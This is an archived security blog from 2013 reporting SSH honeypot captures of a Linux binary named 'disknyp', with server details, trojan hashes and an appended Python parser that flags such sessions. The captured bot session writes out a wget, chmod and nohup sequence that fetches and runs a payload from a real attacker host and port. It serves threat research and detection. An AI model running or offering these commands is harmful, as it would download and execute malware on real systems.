Archive for December, 2013

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:


PATTERNS AND PATTER - AN INVESTIGATION INTO SSH ACTIVITY USING KIPPO HONEYPOTS
Craig Valli, Priya Rabadia and Andrew Woodward
Edith Cowan University, Security Research Institute
Perth, Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a


(available at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. clean-mx also knows the file host, and http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php gives a good view of this activity as well.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured 268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is svch.exe, probably infected, for Windows machines. VirusTotal says only 24 of 48 antivirus vendors detect this trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b


disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03--  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887-byte ELF 32-bit LSB executable. I don’t know yet what it is doing.
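The session above is the classic "rm, wget, chmod, nohup" download-and-execute sequence that automated SSH bots leave in a Kippo honeypot. As an added example (not part of the original post, and not Kippo's own code), the Python below parses a constructed session transcript in the same shape, strips the prompts and command output, and flags the sequence: it collects the fetched URLs, notes when the download host serves on a non-web port (as 198.2.192.204:22 does here), and records what was made executable or launched. The prompt pattern, the command names it looks for, and the sample transcript are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

# Constructed sample session in the shape of the honeypot capture above
# (the URL is the one from the post; the rest is built for this example).
SAMPLE_SESSION = """\
**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
--2013-12-01 03:58:03--  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22... connected.
HTTP request sent, awaiting response... 503
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
"""

# Assumed prompt shape: anything without whitespace, ending in '#' or '$', then a space.
PROMPT_RE = re.compile(r'^\S+[#$] (?P<cmd>.+)$')
URL_RE = re.compile(r'https?://[^\s\'"<>]+')
WEB_PORTS = {80, 443}
DOWNLOADERS = {'wget', 'curl', 'fetch'}


@dataclass
class SessionReport:
    commands: list = field(default_factory=list)       # what the attacker typed
    download_urls: list = field(default_factory=list)  # URLs passed to a downloader
    odd_port_hosts: list = field(default_factory=list) # (host, port) served off a non-web port
    chmod_targets: list = field(default_factory=list)  # files made executable / mode-changed
    executed: list = field(default_factory=list)       # files launched (nohup, ./x, /path/x)

    def is_download_and_execute(self) -> bool:
        """True when the session fetches something and then chmods or runs a file."""
        return bool(self.download_urls) and bool(self.chmod_targets or self.executed)


def extract_commands(session: str) -> list:
    """Keep only prompt lines; wget output, shell errors and the like are dropped."""
    commands = []
    for line in session.splitlines():
        m = PROMPT_RE.match(line)
        if m:
            commands.append(m.group('cmd').strip())
    return commands


def analyse_session(session: str) -> SessionReport:
    """Walk the typed commands and pull out the download-and-execute indicators."""
    report = SessionReport(commands=extract_commands(session))
    for cmd in report.commands:
        argv = cmd.split()
        if not argv:
            continue
        prog = argv[0]
        if prog in DOWNLOADERS:
            for url in URL_RE.findall(cmd):
                report.download_urls.append(url)
                parsed = urlparse(url)
                port = parsed.port or (443 if parsed.scheme == 'https' else 80)
                if port not in WEB_PORTS:
                    report.odd_port_hosts.append((parsed.hostname, port))
        elif prog == 'chmod' and len(argv) >= 3:
            report.chmod_targets.extend(argv[2:])
        elif prog == 'nohup' and len(argv) >= 2:
            report.executed.append(argv[1])
        elif prog.startswith('./') or prog.startswith('/'):
            # Heuristic: an absolute or relative path run directly is treated as a launch.
            report.executed.append(prog)
    return report


if __name__ == '__main__':
    r = analyse_session(SAMPLE_SESSION)
    print('commands:', r.commands)
    print('downloads:', r.download_urls, 'odd ports:', r.odd_port_hosts)
    print('chmod:', r.chmod_targets, 'executed:', r.executed)
    print('download-and-execute pattern:', r.is_download_and_execute())
```

Feeding real Kippo session logs through `analyse_session` gives a quick triage list: the URLs and host:port pairs are the IoCs worth blocking or hunting for, and `odd_port_hosts` surfaces exactly the oddity noted in this post, a file server listening on the SSH port.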